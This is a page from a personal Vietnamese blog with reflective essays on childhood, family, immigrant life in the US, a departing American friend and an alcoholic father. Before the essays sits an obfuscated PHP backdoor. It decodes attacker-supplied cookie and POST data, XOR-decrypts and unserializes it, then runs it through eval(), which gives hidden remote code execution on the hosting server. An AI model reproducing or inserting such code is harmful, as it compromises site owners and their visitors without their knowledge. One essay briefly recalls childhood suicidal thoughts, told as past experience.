$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Another Me – Page 2 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Another Me (page 2 of 13)

em xưa còn thắt bím, nuôi dưỡng thêm ngây thơ

Đa phần khi vừa add nick gái nào, xinh, độc thân trên Facebook xong, anh đều nghĩ rằng mình cần viết bài gì đó, không là những áng văn trác tuyệt thì ít ra cũng phải đôi dòng thơ lãng mạn. Nhưng, xui thay, những lúc ấy, anh ngồi bóp trán cả buổi vẫn không nghĩ ra câu nào khác ngoài những câu cũ rích đại loại như: em, anh thấy khuôn mặt em đẹp, nhưng ngực em còn đẹp hơn, nên chỉ đành thở dài tiếc nuối.

Lại có những khi, chỉ vì vài hình ảnh vu vơ nào đó, lại có hứng viết ra những suy nghĩ miên man trong đầu. Ừ, đôi khi, để tích tụ thứ gì lâu quá cũng không tốt.

Hôm nay, anh lái xe về nhà trên một tuyến đường hoàn toàn khác so với tuyến đường đã đi gần một năm nay. Thật ra việc này đến từ lí do hết sức nhảm nhí: lách qua phải để vượt cái xe đi chậm, rồi khi xin change lane lại qua trái bọn nó không cho, ấy rồi phải chạy thẳng. Có một khúc khi dừng đèn đỏ, anh nhìn ra cửa sổ thấy bên tay trái mình là một hàng cây thấp, và xanh, xanh lắm.

Anh vốn dốt tất cả những gì liên quan đến thực vật học, nên chịu không biết tên nó là gì, nhưng loại cây đó có lá rất giống với lá học bài.
Anh vốn dốt tất cả những gì liên quan đến thực vật học, nên chịu không biết lá học bài tên thật là gì, nhưng đột nhiên anh thấy nhớ nhớ.

Anh nhớ hồi nhỏ thật nhỏ, khi đi học, anh hay chế giễu bọn con gái cứ tới mùa thi lại lấy lá học bài ép vào tập vở, với niềm tin và mong ước mãnh liệt là nó sẽ giúp tăng cái khả năng ghi nhớ của gái. Nhưng khi chúng nó đi khuất, anh lại nhanh tay vặt vài cái, rồi len lén nhét vào cặp.

Một vài năm tháng của tuổi thơ, cái niềm tin ngây ngô ấy đi cùng anh suốt những kì thi; và lạ thay, nó chỉ một cách hết sức thình lình biến mất. Có lẽ nó biến mất vì con người ta phải lớn lên, chứ không vì chúng ta nhận ra điều đó không có thật.

Anh thình lình hạ cửa sổ xuống, bất chấp cái lạnh của trời đông, đưa tay ra ngoài cửa xe, giả vờ nhấp nhấp tay theo nhịp nhạc, rồi, vẫn lén lút như ngày nào, quơ lấy vài chiếc lá, mỉm cười với chính bản thân mình rằng: giờ đây toàn bộ giáo trình nằm trong máy tính, lẽ đâu lại ép vào giữa máy tính chăng?

Anh bồi hồi, không phải vì đoạn kí ức đó, mà là cách bản thân anh nhìn đoạn kí ức đó, như những gì xa xôi không còn có thể chạm tới được…

Tiếng còi của cái xe đậu đằng sau khi đèn xanh mà anh chưa chạy lôi tuột anh về cái hiện tại hổ nhốn, tất bật và đầy bụi bặm, của những lo toan, từ việc học, việc làm, cho tới điều nhỏ nhặt kiểu chạy từ từ, cẩn thận, kẻo đụng vào xe người khác thì đền méo mặt. Anh thở dài vì cái hiện tại này không lâu thì lại chìm vào hồi tưởng khi iPod vang lên giọng Duy Quang

Em xưa còn thắt bím
nuôi dưỡng thêm ngây thơ
Anh xưa còn luýnh quýnh
giữa sân trường trao thư

Anh ước tìm lại được anh của ngày nào, khi trong thư viện viết một mảnh giấy làm quen, lén ném cho cô bé ấy, hồi hộp chờ và thất vọng khi không nhận được hồi âm, để rồi khi về nhà tự chửi mình ngu cả buổi vì mảnh giấy không có thông tin liên lạc gì, thì làm sao cô bé đáp trả.

Anh cũng ước thấy được hình ảnh cô bé cột tóc đuôi gà ngày xưa, mắt đỏ hoe khi nói với anh: quà 8/3 em mua tặng mẹ em, bị bọn anh vô tình quăng vỡ rồi, khi đám bọn anh “đặt nhẹ” cặp của bọn cô ra ngoài, chiếm lấy căn phòng làm chỗ ngủ trưa tại trường; để rồi vài ngày sau, hai má ửng hồng khi anh tặng cành hoa hồng như một món quà làm lành.

Giờ đây, đã không còn anh của lãng mạng trẻ con, lúng túng, ngại ngùng ấy nữa…

Em anh fone nhờ tra giùm nó đường đi tới quán sinh tố, anh định nhân tiện hỏi xem dạo này mẹ thế nào, mà thấy nó vội quá lại thôi. Nhớ tầm 2 tuần trước khi về nhà ăn Thanksgiving, đang đêm anh có việc cần nghe điện thoại, sợ cả nhà thức giấc mới chui ra garage đứng nói chuyện. Trời lúc đó lạnh lắm, trong garage không có hệ thống sưởi, anh mới chui vào trong xe mà ngồi. Giữa cuộc điện thoại ấy, đột nhiên anh nhận ra, anh đang ngồi trong cái xe mà sáng nào mẹ anh cũng lái đi làm. Tay anh đang đặt lên cái vô lăng mà bàn tay gầy gò của mẹ ngày nào cũng nắm lấy. Anh giơ chân mình ướm thử khoảng cách tới thắng và ga, để gắng hình dung hình ảnh mẹ anh lái xe.

Trời, anh thấy thật lạ lẫm, vì ngạc nhiên thay, anh chưa từng thấy mẹ lái xe lần nào.

Anh lớn lên luôn quen với hình ảnh hằng ngày thấy mẹ bán hàng, thấy mẹ nấu cơm, thấy mẹ đi chợ về, thấy mẹ cười vui, thấy mẹ buồn bã… Anh cho dù hiện tại sống xa nhà, vẫn cảm thấy như mẹ anh vẫn là hình ảnh trong trí nhớ bấy lâu, cho đến khoảng khắc đó.

Anh nhìn sang cái hộc trên xe, thấy tấm thẻ nhân viên của mẹ. Anh nhận ra rằng, có quá nhiều hình ảnh của mẹ mà anh đã và đang không được chứng kiến. Anh đột nhiên có cái cảm giác rằng, bằng cách này hay nọ, rồi sẽ có một ngày anh phải hối tiếc vì đã bỏ lỡ những hình ảnh như thế.

Càng ngày khi càng lớn lên, cái suy nghĩ mình cần chở che, bao bọc cho mẹ trong anh ngày càng lớn. Anh thấy buồn khi nghĩ đến bóng mẹ phải lái xe đi làm, anh lo lắng không biết mẹ chạy xe có vững không. Một lần nữa, anh sờ qua vô lăng, hộp số… và lại thấy buồn, buồn với hình ảnh mẹ gầy gò phải xoay trở với cuộc sống vất vả bên này, buồn khi nghĩ đến cảnh mẹ tiếng Anh nói không rành, lạc lõng giữa một đất nước nói một ngôn ngữ xa lạ.

Anh nhớ có lần, mẹ giơ bàn tay lên và nói đùa với anh: mẹ làm công việc sửa máy tính, ngày nào cũng phải vặn ốc, giờ tay chai hết rồi. Từ ngày đó, anh không còn thấy tự hào về bàn tay thon và đẹp của anh nữa.

Thật buồn khi thấy mình lớn lên, và thấy mẹ già đi…

.

Hai năm ở xứ sở cờ hoa

Cuối tuần này về nhà, ngồi nói chuyện với ông Cậu khá thân, Cậu hỏi:
– Sao, hôm nay là tròn hai năm ngày ở đất Mỹ này, thấy thế nào?
Tôi im lặng, dù gần đây đã tự nhắc mình nhớ về ngày 03/07 này, nhưng khi nghe một người khác nói về nó, vẫn có cảm giác bồi hồi và lạ lẫm. Thời gian trôi qua nhanh quá…

Tôi không hẳn là có cái nhu cầu phải tổng kết mỗi năm, để xem mình đã làm được gì nơi xứ lạ quê người trong năm vừa qua. Chỉ là thật sự muốn viết gì đó, để lưu lại những năm tháng đáng nhớ trong một đời người mà thôi.

***

So với năm đầu qua đây đầy bỡ ngỡ, mọi thứ đều làm lại từ đầu, năm thứ hai ở nước Mỹ với gia đình tôi đã đi theo chiều hướng tốt hơn rất nhiều. Công việc của ba mẹ tuy có hơi vất vả, nhưng thu nhập ổn định, không lo nỗi lo bị cho nghỉ việc. Ba mẹ tôi cũng dần hòa nhập hơn (dù tiếng Anh hai người vẫn chưa khá lắm). Cuối tuần ba hay lái xe đưa mẹ đi chợ này chợ nọ để mua đồ. Xong sau đó mẹ về nấu ăn, ba thì lại lái xe đi vòng vòng xem ở đâu có garage sale không, hòng vác về nhà những đồ giá rẻ như cho. Cuộc sống với ba mẹ rất thanh bình. Có những buổi chiều, tôi lười nhác nằm trên nệm và nhìn ra ngoài vườn, thấy ba đang tưới nước cho cỏ và hàng cây một cách thật say mê. Nhà tôi có một mảnh vườn nho nhỏ, ba tuy sức khỏe không tốt nhưng cũng thường xuyên ra cắt cỏ, trồng cây, bón phân cho cây.

Đôi khi tôi nghĩ rằng, ba mẹ hòa nhập vào đời sống bên này nhanh hơn cả tôi. Điều đó làm tôi có cảm giác hơi buồn vì dường như ba mẹ đã dần quên đi Việt Nam. Tôi không trách ba mẹ tôi. Mỗi người có một suy nghĩ của riêng mình. Ba mẹ có lẽ vẫn còn yêu Việt Nam, nhưng bao nhiêu biến cố khiến cuộc đời ba mẹ hoàn toàn bị thay đổi, đã làm hai người cảm thấy rằng mình không thuộc về Việt-Nam-hiện-tại nữa. Một thời tuổi trẻ với bao mộng ước tương lai đã bị đánh mất. Cứ mỗi lần nghĩ về điều đó, nghĩ buồn cho ba mẹ vì sinh nhầm thời, tôi càng cảm thấy yêu họ hơn.

***

Những tháng gần đây, tôi nói chuyện với em gái tôi nhiều hơn. Khi ở gần nó, tôi chưa từng thật sự quan tâm nó theo đúng nghĩa một người anh. Đi xa rồi, mới thấy dù thế nào, tôi vẫn luôn muốn có cảm giác chở che, bao bọc, hướng dẫn cho nó. Tôi hồi đó xem phim hay thấy cảnh anh chị em trong cùng một nhà đấu đá, ghen tị nhau khi lớn lên đụng phải cơm, áo, gạo, tiền. Tôi và em gái tôi sẽ không bao giờ như vậy. Có lẽ, ngoài mẹ tôi ra, nó là người mà tôi yêu thương và quan tâm nhất.

Tôi qua đây khi đã học xong đại học, phải lao đầu vào công việc để kiếm tiền trang trải cuộc sống. Lương ba mẹ đi làm chỉ đủ nuôi em gái tôi ăn học, tôi không thể bỏ việc mà về nhà ăn bám bố mẹ. Đôi lần, khi lái xe một cách vô định cùng em gái giữa trời đêm thăm thẳm, tôi khuyên nó chọn một ngành nào đó thật tốt, vì nó có thời gian, nó có thể bỏ 5, 7 năm ra học ngành nào có tương lai. “Đừng chọn mấy nghề giống anh, làm không đủ ăn, lo nghĩ từng ngày.” Khi tôi nói ra câu này, tôi chỉ mong nó sau này sẽ sống sung sướng, không phải lo phải nghĩ quá nhiều về cuộc sống. Tôi không có cảm giác ghen tị vì em gái tôi có điều kiện theo đuổi những ngành nghề sau này sẽ giúp nó sống giàu có, vui sướng hơn tôi. Thậm chí, nếu sau này vì lí do gì đó tôi có điều kiện hơn, tôi cũng sẽ không ngần ngại lo cho nó về tất cả mọi chuyện.

Năm qua, một trong những điều khiến tôi vui nhất ấy là tôi càng ngày càng thân thiết với em gái tôi hơn, càng ngày càng thấy yêu thương và muốn bao bọc nó hơn. Có lẽ đến cuối đời.

***

Còn bản thân tôi, nếu nhìn vào những gì đã đạt được thì không có bước tiến nổi bật như năm đầu tiên. Tôi vẫn làm công việc với mức lương vừa đủ sống, được một lần tăng lương. Tuy hiện tại việc không nhiều lắm, nhưng khá là căng thẳng vì tuyệt đối không thể để sai sót xảy ra. Chỉ cần sai lầm khi gán một biến, gọi một hàm thôi… là đi nguyên hệ thống, thiệt hại có khi vài chục ngàn USD/ ngày.

Năm rồi, tôi cũng bắt đầu đi học Cao Học. Thật ra, tôi không thấy tấm bằng master ấy giúp ích cho tôi được gì trong công việc hiện tại. Những thứ học ở trường vẫn luôn là những thứ nặng lý thuyết, dù bên Việt Nam hay ở đây cũng vậy. Lý do duy nhất khiến tôi bằng mọi giá lấy được tấm bằng master ấy là vì tôi nghĩ, trong tương lai, nếu tôi cần tìm một công việc khác với mức lương cao hơn, thì nó sẽ rất có ích.

Hai năm trước khi mới bước chân tới Mỹ, tôi nghe nhiều người nói rằng cuộc sống bên này rất khó khăn, kinh tế suy thoái, con đường vào cao học cũng gian nan với bài thi GRE khó nhằn. Giờ đây nhìn lại, tôi tạm hài lòng với những gì mình làm được, khi vừa có việc làm gọi là khá, vừa được học tiếp cao học.

Tôi chưa hoàn toàn thuộc về nước Mỹ. Tôi – từ trong thâm tâm, vẫn trọn vẹn là một người Việt như trước đó đã từng. Tuy nhiên, trong lòng nước Mỹ này, giờ đây tôi đã thôi lạc lõng. Điều đó xuất phát từ việc tôi ý thức được rằng: chỉ cần cố gắng là được. Tôi không tự cao, những gì tôi làm được tới giờ chả được tính gì là nhiều nhặn, nhưng ít ra, tôi cũng bắt kịp đà tiến của các thanh niên bản xứ khác: có việc làm khi ra trường, hay học được tiếp lên cao học. Ngộ ra như thế mang lại cho tôi sự tự tin. Tôi khi muốn có thể hòa vào với người Mỹ. Tôi hoàn toàn thấy vui như là một phần của họ khi đội bóng của thành phố thắng giải này, giải kia… Khi đi offline một trong những forum lớn nhất bên này, tôi cũng cầm chai beer và xâu thịt nướng thoải mái trò chuyện, bông đùa.

Thế đấy, nếu phải tóm gọn về những gì mình đã làm được trong năm vừa qua, tôi nghĩ tôi chỉ dùng ba từ: sự tự tin. Tự tin rằng mình hoàn toàn không thua kém ai. Tự tin để sống, để làm việc, để học, và nghĩ về gia đình riêng của mình. Sớm thôi…

030711
B.l.u.e
.

Charles

Khi Vienna kể với tôi rằng, cô ấy đã khóc rất nhiều trong bữa tiệc chia tay người bạn sau khi hai người tốt nghiệp cao học và ai sẽ phải về nước của người ấy, tôi mỉm cười và khuyên cô những câu sến ngập ngụa như Thanh sơn bích thủy, Hậu hội hữu kỳ (Non xanh vẫn đó, nước biếc còn đây, ngày sau ắt gặp lại)… Vậy mà, tối hôm qua, và cả sáng hôm nay, tôi đã gần như rơi nước mắt.

Cái thước đo duy nhất của hai chữ ‘bạn bè’, nó không nằm ở cái khoảng cách xa – gần, nó không nằm ở lớp bụi thời gian, nó đơn giản chỉ là một ý niệm – cảm thấy là bạn bè, ắt hẳn là bạn bè. Đấy phải chăng mới là thứ tình cảm bạn bè chân chính?

***

Tôi và Charles biết nhau tầm được tám tháng. Ông là người bạn Mỹ đầu tiên của tôi và cũng là người bạn đầu tiên của tôi trên nước Mỹ. Nếu nói là bạn thân, bạn tâm giao hiếm hoi trong đời, kể cũng đúng. Tôi quen rất nhiều, những người tôi từng coi là bạn bè, giờ đây nhiều cái tên đã dần phai mờ trong trí tưởng. Tôi quen, quen nhiều lắm. Nhưng những người mà tôi xem như bạn tâm giao không có mấy người. Đó không phải là tôi đặt một cái tiêu chí cao cho hai chữ “tâm giao” ấy. Đấy đơn giản vì chỉ có những người ấy, không phải ai khác, khiến trong tôi dâng tràn cái ý niệm tuyệt vời của hai tiếng “tâm giao”.

Charles hơn tôi tầm 18 tuổi. Charles và tôi không đơn thuần là hai thế hệ khác nhau, đó còn là hai nền văn hóa khác nhau, hai hệ tư tưởng khác nhau. Charles là con người của một nước Mỹ phồn hoa, nhưng mê những giá trị xưa cũ – những bài nhạc của thập niên 70, 80, những bộ phim mà ông gọi là “kinh điển”. Tâm hồn tôi thuộc về một Việt Nam xưa cũ, thuộc về cái lớp bụi mịt mù phủ trên con đường làng quê, thuộc về một Hà Nội đầy hoài niệm, một Sài Gòn bát nháo, bon chen. Nhưng, tôi và ông rất hợp, ngay từ những giây đầu tiên tôi gặp ông.

Những ai từng biết tôi, ắt sẽ rõ khoảng thời gian đầu tiên của cái mà người ta hay gọi là “Giấc mơ Mỹ”, với tôi, nó khó khăn đầy trắc trở như thế nào. Bước ngoặt của tôi đến vào lúc tôi nhận được cuộc gọi đi thử việc ở một công ty bên này. Tôi chưa bao giờ là một kẻ thiếu tự tin, kể cả khi đứng trước hàng trăm người bình luận, hay khi quyết định lao vào những cuộc yêu mà ai đó đều nói sẽ không có kết quả. Nhưng khi cái máy bay mang số hiệu gì chả rõ, hạ cánh cái ầm xuống Dallas, tim tôi đập nhanh, tay chân lóng ngóng, đôi mắt dáo dác đảo xung quanh, đến mức nếu mà nhìn mặt tôi không ngu ngu bẩm sinh như thế, ắt an ninh sân bay đã tưởng tôi là khủng bố gì đó rồi. Sở dĩ tôi căng thẳng thế, vì tôi biết đây là cơ hội tốt và hiếm hoi, và tôi buộc phải nắm lấy, nếu muốn biến cái “Giấc mơ Mỹ” của tôi thành một cơn mộng đẹp. À, cũng khổ, mới tốt nghiệp ra trường ở Việt Nam đã đi định cư, lần đầu tiên đi làm, đã lại làm ở một công ty nước ngoài, với những người đến từ một nền văn hóa khác, nói những thứ tiếng mà tôi lúc đó khó có thể hiểu trọn.

Tôi bước vào phòng họp công ty, quanh cái bàn tròn là những khuôn mặt đầy xa lạ đang mỉm cười, gắng nặn ra một nụ cười duyên dáng nhất mà cái mỏ đang cứng đơ của tôi có thể tạo thành, lần lượt bắt tay giới thiệu với từng người. Sau khi ngồi xuống, tôi phát hiện có một gã nhìn tôi rất ‘kì lạ’, với cái cười ‘gian gian’ – sau tôi mới biết đó là kiểu cười đặc trưng của tay ấy. Hết buổi họp, tay ấy, và lúc đó khi nhắc lại tên, tôi mới nhớ là Charles hỏi tôi ngay: I know your English is not good, but don’t worry…

Ngồi hí hoáy sắp đặt cái không gian làm việc đầu tiên của một mình một lúc, là tới trưa rồi, Charles tới, câu đầu tiên ổng bảo là: We will go to a Vietnamese restaurant near here, I don’t know whether you wanna join us, it is quite good. Tôi trả lời ngay: What did you think when you said that, I am Vietnamese…, à dĩ nhiên là với thứ tiếng Anh ngọng ngịu.

Khi tôi lên đây thử việc ba tuần, công ty thuê một phòng khách sạn cho tôi ở. Và Charles đảm nhận nhiệm vụ đưa đón tôi mỗi ngày. Mỗi sáng, tôi đều ngồi ăn điểm tâm ở sảnh khách sạn, chờ Charles lái cái xe Audi đẹp đẽ tới. Chúng tôi lên xe, ghé Starbucks và nói đủ chuyện trên trời dưới biển. Ngay từ những lần đầu tiên, bọn tôi đã nói về chiến tranh Việt Nam, về Uncle Ho, về how fucking hilarious Vietnamese girls are… Khi lên tới freeway, lại mở cửa xe ra, gió thổi vào lồng lộng và cùng gào thét những bài của The Beatles, The Police…

Ở khách sạn được tầm một tuần, Charles bảo tôi chuyển tới ở chung với ổng cho đỡ buồn, nhà ổng còn phòng trống. Thế là tôi lần nữa xách vali đi. Tới căn nhà của Charles, tôi cùng ông bắt đầu nấu những món ăn Việt Nam – phù, dở tệ, cùng ngồi loay hoay chơi Dynasty Warrior, Call of Duty, Medal of Honors… trên XBox, Playstation mỗi tối.

Charles giới thiệu cho tôi những bộ phim kinh điển của Mỹ, ngồi giảng giải cho tôi luật bóng bầu dục, nói như ông là: wanna teach you the real American cultures… Có những chiều nóng nực, tôi cùng ông ôm hai con chó nhảy ùm xuống hồ. Có những đêm dịu mát, chúng tôi xách kính viễn vọng ra nhìn lên bầu trời trăng sao xa thăm thẳm, cùng bàn kế hoạch sẽ làm gì khi người ngoài hành tinh tấn công trái đất. Charles dắt tôi đi hết các tiệm ăn ngon ở Dallas, cùng tôi đi mua đồ ở chợ Việt Nam. Đến lúc ông đi mua súng, tôi cũng đi cùng ông. Rồi tôi và Charles cùng nhau đi bắn súng – lần đầu tiên trong đời tôi bắn súng thật. Rất nhiều, rất nhiều kỉ niệm.

Sau đó, tôi về lại Houston một tuần chờ quyết định xem công ty có nhận tôi không. Khi tôi lên lại đây làm việc, tôi cùng Charles lái xe vòng vòng, đi tìm nhà, rồi cùng nhau dọn nhà.

Charles quen bất cứ ai, đều dắt về nhà và hỏi tôi nghĩ thế nào về cô ấy. Rồi chúng tôi cùng đi xem film, đi ăn, cùng trò chuyện vui vẻ.

Ở một thời gian, Charles không thấy tôi cặp kè với ai, ông đưa tôi cái account ở một trang Online Dating phải trả phí, bảo tôi đổi profile thành của tôi rồi xài. Tôi đổi cho ông vui, rồi để nó đóng bụi ở đó, mặc ông ngày nào cũng cằn nhằn: tao chỉ muốn tốt cho mày thôi… Tôi và ông ngày nào cũng đi ăn phở ở quán Việt Nam, ổng hay lân la ra chỗ ông bà chủ quán và bảo họ tìm thử xem có ai xinh giới thiệu cho tôi không, tôi tốt bụng lắm.

Khi con trai của Charles lần đầu tiên dọn tới ở chung với ông sau mười sáu năm, tôi lặng người nhìn niềm hạnh phúc hiển thị rõ rệt trên khuôn mặt ông, khi ông và tôi lái xe tới phi trường đón nó. Và cũng sau đó, tôi chứng kiến những cái nhíu mày đầy phiền muộn, những lần đôi mắt ông đỏ hoe hoe, mỗi khi ông và con trai có chuyện. Những ngày sau đó, hành động tôi và ông làm nhiều nhất là những đêm tối trời, tôi và ông đứng ở ngoài hiên sau, ngắm trời sao, ông rít thuốc liên tục, và chúng tôi cùng nói chuyện về cuộc sống, về con trai của ông.

Lúc đó, tôi mới thấy được một con người khác ngoài một người lúc nào cũng đùa giỡn liên hồi – một người cha đầy tâm sự về đứa con hư của mình. Những niềm vui khi nó học giỏi, những nỗi buồn khi he fucked everything up, tôi và Charles đều cùng trải nghiệm, cùng cảm nhận, cùng trải qua. Chúng tôi cũng hay lái xe ra ngoài lúc nửa đêm, chỉ lái loanh quanh vô định, Charles đốt thuốc, tôi cảm thán, và đôi lần bị cảnh sát hỏi thăm vì tưởng là trộm đảo quanh quẩn.

Những lần con trai Charles trong đội bóng bầu dục của trường thi đấu, tôi đều tới, ngồi cạnh ông, cùng hòa chung nhịp điệu của trận đấu. Ba người chúng tôi làm nhiều việc cùng nhau như thế ấy, như một gia đình nhỏ…

Charles hay phàn nàn về việc tôi chuyên môn quăng đồ tứ lung tung ở sofa, bàn ăn, và phòng khách; hay khi tôi lúc nào cũng ôm lấy cái laptop, kể cả khi ăn. Nhưng chúng tôi rất hợp, như có lần ông nói: you are the best roommate one can have…

***

Tôi đang ở Houston cùng gia đình đón Tết Tây khi tôi nhận được điện thoại của ông giám đốc là Charles is not going to work with us. Có rất nhiều lí do, nhiều nguyên nhân, đó là kết quả của một chuỗi các sự việc không ai lường được. Charles sẽ quay lại Arizona. Đó là lựa chọn duy nhất.

Hôm qua, khi tôi lái lên Dallas, tôi ngồi nói chuyện với ông, mắt ông đỏ hoe, tay chấm nước mắt vài lần. Ông bảo tôi: I know we will miss each other. Charles nói điều ông nhớ nhất sẽ là tôi và ông có cảm giác như một gia đình, khi hai người cùng đi làm về, và cùng nói chuyện về con cái, về cuộc sống. Tối qua là một trong những lần hiếm hoi tôi có cảm giác còn buồn hơn cả khóc…

Cái ngày ông đi, sẽ rất gần, sẽ chẳng bao giờ biết có dịp gặp lại. Rất buồn, nhưng vẫn phải nói lời tạm biệt tới người bạn đầu tiên của tôi trên đất Mỹ, lại là một người mà tôi có thể gọi bằng hai tiếng “tâm giao”.

Wish you all the best.

Hải
null.

2011 resolution

khi người ta trẻ, trước mỗi thềm năm mới, người ta tự viết ra cho mình một lô một lốc các điều cần làm và quyết tâm làm trong năm mới, dù họ biết, cái sự khắc nghiệt và đồng bóng của cõi đời, sẽ không bao giờ cho phép họ – những con người yếu đuối, nhỏ nhoi, được đi theo cái lộ trình mà họ đã vạch ra ấy

ấy thế, năm này qua năm khác, khi thời gian đang bò lê bò lết những khoảng khắc cuối cùng của một năm – dần – đã – cũ, người ta lại hay ngồi, tập trung, và viết cái – gần – như – vô – nghĩa đó

2011 resolution với anh, chỉ đơn giản như một câu của Guillaumet trong Cõi người ta:

Anh chống lại mọi cám dỗ. Anh bảo: nằm ở trong lòng tuyết, con người ta mất tuốt hết linh tính tự vệ. Đi suốt hai, ba, bốn ngày đường, con người chỉ còn có cầu mong giấc ngủ. Tôi cũng ước mong được ngủ. Nhưng tự nghĩ: vợ tôi, nếu tin là tôi còn sống, ắt tin là tôi đương đi. Bạn hữu tôi, cũng tin rằng tôi đương đi. Mọi người cùng tin cậy nơi tôi. Tôi là một thằng tồi nếu tôi dừng bước lại.

mong ước cho năm 2011 của anh cũng như thế, dù bất cứ điều gì xảy ra, cũng chỉ mong đủ niềm tin, đủ kiên nghị để mãi đi trên con đường mà mình đã chọn – bất kể con đường đó có khó khăn, hiểm trở như thế nào

vì còn sống là còn phải đi

và các bạn của anh, anh cũng mong cho các bạn luôn gặp những may mắn, mong cho con đường mà các bạn đi năm mới này sẽ luôn bằng phẳng, luôn thuận lợi. Nhưng, nếu vì bất cứ lí do gì, chẳng hạn tạo hóa trêu ngươi, khiến con đường đó gập ghềnh đi một chút xíu, mong cách bạn hãy luôn nhớ rằng: anh – bạn hữu của các bạn, tin cậy nơi các bạn, tin rằng dù thế nào thì các bạn vẫn đương đi…

Happy New Year!

01012011
B.l.u.e
.

ba

Người ta có thể chọn mọi thứ, nhưng không thể chọn người sinh ra mình. Đại loại là có ai từng nói với tôi câu này, là mẹ tôi, là bà nội tôi, hay là bác ruột tôi? – trời, kí ức qua lâu lắm rồi, làm sao tôi nhớ được cơ chứ? Tôi chỉ biết họ nói câu này khi tôi bảo rằng tôi hận ba tôi. Những cảm nghĩ, những tình cảm của tôi về ba, nó nhòe nhoẹt lắm, không phải vì do thời gian làm cho nó mờ đi, mà là do có quá nhiều cảm xúc khác nhau, và mỗi thứ đều là những thái cực hoàn toàn tương phản.

Lịch sử dưới góc nhìn của một đất nước chỉ là những biến cố xảy ra, theo cách này hay cách khác, nhưng đối với nhiều người, nó đơn giản để lại những hệ quả cả đời người. Ba tôi hồi trẻ học giỏi, đẹp trai, hát hay và đàn giỏi (tôi thì không được cái nào trong cả bốn cái đó). Ông có lẽ đã được đi du học nếu không xảy ra sự kiện 1975. Và chính cái biến cố ấy đã ảnh hưởng sâu sắc đến ông sau này.

Có hai thứ gắn liền với hình ảnh ba mà tôi nhớ nhất khi nghĩ về tuổi thơ của mình: đó là hình ảnh chai xì dầu bay đánh choảng vào cái tủ sau lưng, chỉ cách đầu tôi vài gang tay, và hình ảnh ngọn đèn thắp thâu đêm khi ba kèm tôi học. Những kí ức yêu, hận cứ đan xen lẫn nhau, đi cùng tôi đến gần hai mươi năm cuộc đời.

Có những lần khi ba uống rượu say, tôi hay ngồi một góc, lặng nhìn khuôn mặt đang rất tức giận, và tự hỏi liệu đó có phải là người đàn ông rất tinh tế, rất nghệ sĩ luôn tươi cười mà mình biết trước đó? Những lúc như vậy, tôi hay nghĩ về quá khứ, khi ông cùng tôi chơi đá banh, những lúc ông học cùng tôi, giải toán cùng tôi, hình ảnh ông ngồi im trên chiếc xích đu cũ kĩ, nhìn ra bãi cỏ xám bạc cả một màu vào những buổi chiều ông chờ tôi tan lớp bồi dưỡng học sinh giỏi ở huyện về, hay hình ảnh ông nhảy xuống ao hì hục tát nước lên dập cho tắt đám cháy mà tôi và thằng Bảo, vì nghịch ngợm chơi trò búng diêm đã xém đốt gần như trụi bãi cỏ của trường. Cũng có lúc, tôi lại nhớ về cái ngày mà ba nói với tôi: ba mẹ bỏ những gì gầy dựng bao năm ở đây, chuyển nhà lên thành phố để con học cho tốt.

Tôi biết ơn ba lắm, ông dạy tôi từ những bài học của cuộc đời ông, những bài học mà một anh chàng vốn thư sinh như ông phải đánh đổi bằng mồ hôi và nước mắt, bằng những ân tình và cả lừa dối của người đời. Nhưng rồi, cũng có lần tôi hận ba ghê gớm, khi ba và mẹ gây sự ầm ĩ cả xóm làng, và sáng hôm sau, tôi đi học, tôi đến trường trong cái nhìn đầy thương cảm của bọn bạn.

Tôi hận ông, đặc biệt khi nhìn thấy những giọt nước mắt của mẹ, của em gái tôi, và đôi khi của tôi – như thể tôi đang từ ở một nơi nào đó xa lắm, một tầng không gian nào đó và đang nhìn xuống cái cảnh tan tành đang diễn ra. Đôi khi tôi thấy quen thuộc đến chai lì với nó, đôi khi tôi thấy đau đớn khôn nguôi.

Những cơn say của ông diễn ra thường xuyên đến mức, nhiều khi ngay sau lúc xưng tội xong, biết rằng mình đã được Chúa tha thứ hết, tôi nghe tiếng còi tàu xe lửa hú vang lên và nghĩ, hay mình đâm đầu vào đó cho xong, vì chắc chắn chết rồi sẽ được lên thiên đàng, sẽ có cuộc sống tốt hơn hiện tại. Nhưng rồi tôi lại nhớ về mẹ tôi, về em gái tôi. Đó cũng là lúc tôi tự bảo mình phải mạnh mẽ hơn.

Năm tôi bắt đầu học cấp ba, cũng là khi tôi bắt đầu phản kháng lại ông. Những lần ầm ĩ trong nhà tôi hay bắt nguồn từ các kịch bản quen thuộc, ba la tôi hay em tôi, mẹ tôi bênh lại, và cuối cùng tôi là người đứng thẳng lên phản kháng. Những lúc như thế, những lúc khi tôi sẫng giọng lên với ông, nhìn vào đôi mắt đỏ hằn vệt máu của ông, tôi nghĩ ông sẽ đánh tôi, nhưng ông chỉ run run và bảo: ngay cả mày giờ cũng như thế, rồi đóng sập cửa phòng lại và ngồi trong đó cả ngày. Những lần đó, tôi hay tự hỏi, ông làm gì trong đó, liệu ông có đang buồn vì tôi như thế?

